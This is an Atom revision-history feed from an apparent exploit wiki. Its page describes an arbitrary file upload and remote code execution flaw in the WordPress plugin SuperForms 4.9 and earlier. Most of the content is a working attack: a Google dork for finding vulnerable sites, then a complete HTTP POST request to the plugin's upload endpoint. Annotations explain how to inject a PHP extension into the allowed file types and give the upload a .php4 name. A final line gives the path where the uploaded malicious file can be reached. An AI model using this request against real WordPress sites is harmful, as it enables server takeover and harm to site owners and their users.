https://pwnwiki.com/index.php?action=history&feed=atom&title=WordPress_%E6%8F%92%E4%BB%B6_SuperForms_4.9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E WordPress 插件 SuperForms 4.9 任意文件上傳&遠程代碼執行漏洞 - Revision history 2026-04-21T05:28:13Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=WordPress_%E6%8F%92%E4%BB%B6_SuperForms_4.9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1622&oldid=prev Pwnwiki: Created page with "==Google Dork== <pre> inurl:"/wp-content/plugins/super-forms/" </pre> ==影響版本== All (<= 4.9.X) ==POC== <pre> POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1..." 2021-04-13T09:20:13Z <p>Created page with &quot;==Google Dork== &lt;pre&gt; inurl:&quot;/wp-content/plugins/super-forms/&quot; &lt;/pre&gt; ==影響版本== All (&lt;= 4.9.X) ==POC== &lt;pre&gt; POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1...&quot;</p> <p><b>New page</b></p><div>==Google Dork==<br /> &lt;pre&gt;<br /> inurl:&quot;/wp-content/plugins/super-forms/&quot;<br /> &lt;/pre&gt;<br /> <br /> ==影響版本==<br /> All (&lt;= 4.9.X)<br /> <br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1<br /> &lt;=== exploit end point<br /> Host: localhost<br /> User-Agent: UserAgent<br /> Accept: application/json, text/javascript, */*; q=0.01<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> X-Requested-With: XMLHttpRequest<br /> Content-Type: multipart/form-data;<br /> boundary=---------------------------423513681827540048931513055996<br /> Content-Length: 7058<br /> Origin: localhost<br /> Connection: close<br /> Referer: localhost<br /> Cookie: <br /> <br /> -----------------------------423513681827540048931513055996<br /> Content-Disposition: form-data; name=&quot;accept_file_types&quot;<br /> <br /> jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF &lt;=======<br /> inject extension (|PHP4) to validate file to upload<br /> -----------------------------423513681827540048931513055996<br /> Content-Disposition: form-data; name=&quot;max_file_size&quot;<br /> <br /> 8000000<br /> -----------------------------423513681827540048931513055996<br /> Content-Disposition: form-data; name=&quot;image_library&quot;<br /> <br /> 0<br /> -----------------------------423513681827540048931513055996<br /> Content-Disposition: form-data; name=&quot;files[]&quot;;<br /> filename=&quot;filename.(extension)&quot; &lt;==== inject code extension (.php4)<br /> for example<br /> Content-Type: application/pdf<br /> <br /> Evil codes to be uploaded<br /> <br /> -----------------------------423513681827540048931513055996--<br /> <br /> # Uploaded Malicious File can be Found in :<br /> /wp-content/uploads/superforms/2021/01/&lt;id&gt;/filename.php4<br /> u can get &lt;id&gt; from server reply .<br /> &lt;/pre&gt;</div> Pwnwiki